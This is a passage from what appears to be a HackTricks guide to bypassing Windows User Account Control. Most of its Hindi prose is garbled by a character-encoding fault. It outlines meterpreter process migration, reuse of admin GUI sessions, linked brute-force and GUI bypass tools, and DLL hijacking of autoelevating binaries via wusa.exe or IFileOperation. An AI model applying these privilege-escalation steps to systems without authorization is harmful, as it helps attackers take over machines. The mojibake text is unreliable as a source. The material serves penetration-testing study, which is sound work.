рдЖрдк meterpreter рд╕рддреНрд░ рдХрд╛ рдЙрдкрдпреЛрдЧ рдХрд░рдХреЗ рдкреНрд░рд╛рдкреНрдд рдХрд░ рд╕рдХрддреЗ рд╣реИрдВред рдПрдХ рдкреНрд░рдХреНрд░рд┐рдпрд╛ рдореЗрдВ рдорд╛рдЗрдЧреНрд░реЗрдЯ рдХрд░реЗрдВ рдЬрд┐рд╕рдХрд╛ рд╕рддреНрд░ рдорд╛рди 1 рдХреЗ рдмрд░рд╛рдмрд░ рд╣реИ:
(explorer.exe рдХрд╛рдо рдХрд░рдирд╛ рдЪрд╛рд╣рд┐рдП)
UAC Bypass with GUI
рдпрджрд┐ рдЖрдкрдХреЗ рдкрд╛рд╕ GUI рддрдХ рдкрд╣реБрдБрдЪ рд╣реИ рддреЛ рдЖрдк рдЬрдм UAC рдкреНрд░реЙрдореНрдкреНрдЯ рдкреНрд░рд╛рдкреНрдд рдХрд░рддреЗ рд╣реИрдВ рддреЛ рдмрд╕ рдЗрд╕реЗ рд╕реНрд╡реАрдХрд╛рд░ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ, рдЖрдкрдХреЛ рд╡рд╛рд╕реНрддрд╡ рдореЗрдВ рдЗрд╕реЗ рдмрд╛рдпрдкрд╛рд╕ рдХрд░рдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рдирд╣реАрдВ рд╣реИред рдЗрд╕рд▓рд┐рдП, GUI рддрдХ рдкрд╣реБрдБрдЪ рдкреНрд░рд╛рдкреНрдд рдХрд░рдирд╛ UAC рдХреЛ рдмрд╛рдпрдкрд╛рд╕ рдХрд░рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрдЧрд╛ред
рдЗрд╕рдХреЗ рдЕрд▓рд╛рд╡рд╛, рдпрджрд┐ рдЖрдкрдХреЛ рдПрдХ GUI рд╕рддреНрд░ рдорд┐рд▓рддрд╛ рд╣реИ рдЬрд┐рд╕рдХрд╛ рдХреЛрдИ рдФрд░ рдЙрдкрдпреЛрдЧ рдХрд░ рд░рд╣рд╛ рдерд╛ (рд╕рдВрднрд╡рддрдГ RDP рдХреЗ рдорд╛рдзреНрдпрдо рд╕реЗ) рддреЛ рд╡рд╣рд╛рдБ рдХреБрдЫ рдЙрдкрдХрд░рдг рд╣реЛрдВрдЧреЗ рдЬреЛ рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдХреЗ рд░реВрдк рдореЗрдВ рдЪрд▓ рд░рд╣реЗ рд╣реЛрдВрдЧреЗ рдЬрд╣рд╛рдБ рд╕реЗ рдЖрдк cmd рдХреЛ рдЙрджрд╛рд╣рд░рдг рдХреЗ рд▓рд┐рдП рд╡реНрдпрд╡рд╕реНрдерд╛рдкрдХ рдХреЗ рд░реВрдк рдореЗрдВ рд╕реАрдзреЗ рдЪрд▓рд╛ рд╕рдХрддреЗ рд╣реИрдВ рдмрд┐рдирд╛ UAC рджреНрд╡рд╛рд░рд╛ рдлрд┐рд░ рд╕реЗ рдкреНрд░реЙрдореНрдкреНрдЯ рдХрд┐рдПред рдЬреИрд╕реЗ https://github.com/oski02/UAC-GUI-Bypass-appverifред рдпрд╣ рдереЛрдбрд╝рд╛ рдЕрдзрд┐рдХ рдЧреБрдкреНрдд рд╣реЛ рд╕рдХрддрд╛ рд╣реИред
Noisy brute-force UAC bypass
рдпрджрд┐ рдЖрдкрдХреЛ рд╢реЛрд░ рдХрд░рдиреЗ рдХреА рдкрд░рд╡рд╛рд╣ рдирд╣реАрдВ рд╣реИ рддреЛ рдЖрдк рд╣рдореЗрд╢рд╛ рдХреБрдЫ рдРрд╕рд╛ рдЪрд▓рд╛ рд╕рдХрддреЗ рд╣реИрдВ https://github.com/Chainski/ForceAdmin рдЬреЛ рдЕрдиреБрдорддрд┐рдпреЛрдВ рдХреЛ рдмрдврд╝рд╛рдиреЗ рдХреЗ рд▓рд┐рдП рдкреВрдЫрддрд╛ рд╣реИ рдЬрдм рддрдХ рдЙрдкрдпреЛрдЧрдХрд░реНрддрд╛ рдЗрд╕реЗ рд╕реНрд╡реАрдХрд╛рд░ рдирд╣реАрдВ рдХрд░рддрд╛ред
Your own bypass - Basic UAC bypass methodology
рдпрджрд┐ рдЖрдк UACME рдкрд░ рдПрдХ рдирдЬрд╝рд░ рдбрд╛рд▓рддреЗ рд╣реИрдВ рддреЛ рдЖрдк рджреЗрдЦреЗрдВрдЧреЗ рдХрд┐ рдЕрдзрд┐рдХрд╛рдВрд╢ UAC рдмрд╛рдпрдкрд╛рд╕ рдПрдХ Dll Hijacking рдХрдордЬреЛрд░рд┐рдпреЛрдВ рдХрд╛ рджреБрд░реБрдкрдпреЛрдЧ рдХрд░рддреЗ рд╣реИрдВ (рдореБрдЦреНрдп рд░реВрдк рд╕реЗ C:\Windows\System32 рдкрд░ рджреБрд░реНрднрд╛рд╡рдирд╛рдкреВрд░реНрдг dll рд▓рд┐рдЦрдирд╛)ред Dll Hijacking рдХрдордЬреЛрд░реА рдЦреЛрдЬрдиреЗ рдХреЗ рд▓рд┐рдП рдЗрд╕реЗ рдкрдврд╝реЗрдВред
- рдПрдХ рдмрд╛рдЗрдирд░реА рдЦреЛрдЬреЗрдВ рдЬреЛ autoelevate рдХрд░реЗрдЧрд╛ (рдЬрд╛рдБрдЪ рдХрд░реЗрдВ рдХрд┐ рдЬрдм рдЗрд╕реЗ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рддрд╛ рд╣реИ рддреЛ рдпрд╣ рдЙрдЪреНрдЪ рдЕрдЦрдВрдбрддрд╛ рд╕реНрддрд░ рдкрд░ рдЪрд▓рддрд╛ рд╣реИ)ред
- procmon рдХреЗ рд╕рд╛рде "NAME NOT FOUND" рдШрдЯрдирд╛рдУрдВ рдХреЛ рдЦреЛрдЬреЗрдВ рдЬреЛ DLL Hijacking рдХреЗ рд▓рд┐рдП рдХрдордЬреЛрд░ рд╣реЛ рд╕рдХрддреА рд╣реИрдВред
- рдЖрдкрдХреЛ рд╕рдВрднрд╡рддрдГ рдХреБрдЫ рд╕рдВрд░рдХреНрд╖рд┐рдд рдкрдереЛрдВ (рдЬреИрд╕реЗ C:\Windows\System32) рдХреЗ рдЕрдВрджрд░ DLL рд▓рд┐рдЦрдиреЗ рдХреА рдЖрд╡рд╢реНрдпрдХрддрд╛ рд╣реЛрдЧреА рдЬрд╣рд╛рдБ рдЖрдкрдХреЗ рдкрд╛рд╕ рд▓рд┐рдЦрдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рдирд╣реАрдВ рд╣реИред рдЖрдк рдЗрд╕реЗ рдмрд╛рдпрдкрд╛рд╕ рдХрд░ рд╕рдХрддреЗ рд╣реИрдВ:
- wusa.exe: Windows 7, 8 рдФрд░ 8.1ред рдпрд╣ рд╕рдВрд░рдХреНрд╖рд┐рдд рдкрдереЛрдВ рдХреЗ рдЕрдВрджрд░ CAB рдлрд╝рд╛рдЗрд▓ рдХреА рд╕рд╛рдордЧреНрд░реА рдХреЛ рдирд┐рдХрд╛рд▓рдиреЗ рдХреА рдЕрдиреБрдорддрд┐ рджреЗрддрд╛ рд╣реИ (рдХреНрдпреЛрдВрдХрд┐ рдпрд╣ рдЙрдкрдХрд░рдг рдЙрдЪреНрдЪ рдЕрдЦрдВрдбрддрд╛ рд╕реНрддрд░ рд╕реЗ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рд╣реЛрддрд╛ рд╣реИ)ред
- IFileOperation: Windows 10ред
- рдПрдХ рд╕реНрдХреНрд░рд┐рдкреНрдЯ рддреИрдпрд╛рд░ рдХрд░реЗрдВ рдЬреЛ рдЖрдкрдХреЗ DLL рдХреЛ рд╕рдВрд░рдХреНрд╖рд┐рдд рдкрде рдХреЗ рдЕрдВрджрд░ рдХреЙрдкреА рдХрд░реЗ рдФрд░ рдХрдордЬреЛрд░ рдФрд░ рдСрдЯреЛрдПрд▓реАрд╡реЗрдЯреЗрдб рдмрд╛рдЗрдирд░реА рдХреЛ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд░реЗред
Another UAC bypass technique
рдЗрд╕рдореЗрдВ рдпрд╣ рджреЗрдЦрдирд╛ рд╢рд╛рдорд┐рд▓ рд╣реИ рдХрд┐ рдХреНрдпрд╛ рдПрдХ autoElevated рдмрд╛рдЗрдирд░реА рдкрдВрдЬреАрдХрд░рдг рд╕реЗ рдмрд╛рдЗрдирд░реА рдпрд╛ рдХрдорд╛рдВрдб рдХреЗ рдирд╛рдо/рдкрде рдХреЛ рдкрдврд╝рдиреЗ рдХреА рдХреЛрд╢рд┐рд╢ рдХрд░рддреА рд╣реИ рдЬрд┐рд╕реЗ рдирд┐рд╖реНрдкрд╛рджрд┐рдд рдХрд┐рдпрд╛ рдЬрд╛рдирд╛ рд╣реИ (рдпрд╣ рдЕрдзрд┐рдХ рджрд┐рд▓рдЪрд╕реНрдк рд╣реИ рдпрджрд┐ рдмрд╛рдЗрдирд░реА рдЗрд╕ рдЬрд╛рдирдХрд╛рд░реА рдХреЛ HKCU рдХреЗ рдЕрдВрджрд░ рдЦреЛрдЬрддреА рд╣реИ)ред
Use Trickest to easily build and automate workflows powered by the world's most advanced community tools.
Get Access Today:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
{% hint style="success" %}
Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Support HackTricks
- Check the subscription plans!
- Join the ЁЯТм Discord group or the telegram group or follow us on Twitter ЁЯРж @hacktricks_live.
- Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.